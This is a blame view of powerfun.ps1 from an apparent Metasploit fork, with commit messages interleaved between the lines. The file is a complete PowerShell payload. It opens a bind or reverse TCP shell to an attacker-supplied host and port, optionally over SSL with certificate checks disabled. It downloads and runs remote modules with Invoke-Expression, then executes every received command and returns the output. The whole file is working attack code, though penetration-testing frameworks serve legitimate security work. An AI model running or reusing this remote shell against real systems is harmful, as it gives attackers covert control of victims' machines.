adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
3da170a43c7f288fe9bc88fe325da488733acac3
metasploit-gs/data/exploits/powershell/powerfun.ps1
T

Ignoring revisions in .git-blame-ignore-revs. Click here to bypass and see the normal blame view.

73 lines
2.2 KiB
PowerShell
Raw Normal View History

updates to include reverse and bind
2015-04-22 20:41:19 +01:00
function Get-Webclient
{
$wc = New-Object -TypeName Net.WebClient
$wc.UseDefaultCredentials = $true
$wc.Proxy.Credentials = $wc.Credentials
$wc
Move script out of module
2015-04-19 21:12:23 +01:00
}
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
function powerfun
{
Param(
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
[String]$Command,
Fix spacinG
2015-05-11 09:04:03 +01:00
[String]$Sslcon,
[String]$Download
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
)
Process {
$modules = @(MODULES_REPLACE)
if ($Command -eq "bind")
{
$listener = [System.Net.Sockets.TcpListener]LPORT_REPLACE
$listener.start()
$client = $listener.AcceptTcpClient()
}
if ($Command -eq "reverse")
{
$client = New-Object System.Net.Sockets.TCPClient("LHOST_REPLACE",LPORT_REPLACE)
Create our own Rex connection to the endpoint
2015-04-19 23:38:41 +01:00
}
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
$stream = $client.GetStream()
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
if ($Sslcon -eq "true")
{
$sslStream = New-Object System.Net.Security.SslStream($stream,$false,({$True} -as [Net.Security.RemoteCertificateValidationCallback]))
fix ssl connection on Windows Server 2012
2021-11-09 16:24:46 +00:00
$sslStream.AuthenticateAsClient("LHOST_REPLACE",$null,"tls12",$false)
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
$stream = $sslStream
}
new changes
2015-05-19 16:18:06 +01:00
[byte[]]$bytes = 0..20000|%{0}
minor powerfun improvements
2021-10-29 13:59:39 +01:00
$sendbytes = ([text.encoding]::ASCII).GetBytes("Windows PowerShell running as user " + $env:username + " on " + $env:computername + "`nCopyright (C) Microsoft Corporation. All rights reserved.`n`n")
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
$stream.Write($sendbytes,0,$sendbytes.Length)
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
if ($Download -eq "true")
{
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
$sendbytes = ([text.encoding]::ASCII).GetBytes("[+] Loading modules.`n")
$stream.Write($sendbytes,0,$sendbytes.Length)
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
ForEach ($module in $modules)
{
(Get-Webclient).DownloadString($module)|Invoke-Expression
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
}
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
}
SSL Support for Powershell Payloads
2015-05-10 21:45:59 +01:00
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0)
{
$EncodedText = New-Object -TypeName System.Text.ASCIIEncoding
$data = $EncodedText.GetString($bytes,0, $i)
$sendback = (Invoke-Expression -Command $data 2>&1 | Out-String )
Move script out of module
2015-04-19 21:12:23 +01:00
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
$sendback2 = $sendback + 'PS ' + (Get-Location).Path + '> '
$x = ($error[0] | Out-String)
$error.clear()
$sendback2 = $sendback2 + $x
Move script out of module
2015-04-19 21:12:23 +01:00
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2)
$stream.Write($sendbyte,0,$sendbyte.Length)
$stream.Flush()
}
$client.Close()
minor powerfun improvements
2021-10-29 13:59:39 +01:00
if ($listener)
{
updates to include reverse and bind
2015-04-22 20:41:19 +01:00
$listener.Stop()
}
minor powerfun improvements
2021-10-29 13:59:39 +01:00
}
updates to author comments in powershell script
2015-04-25 08:47:17 +01:00
}
Reference in New Issue Copy Permalink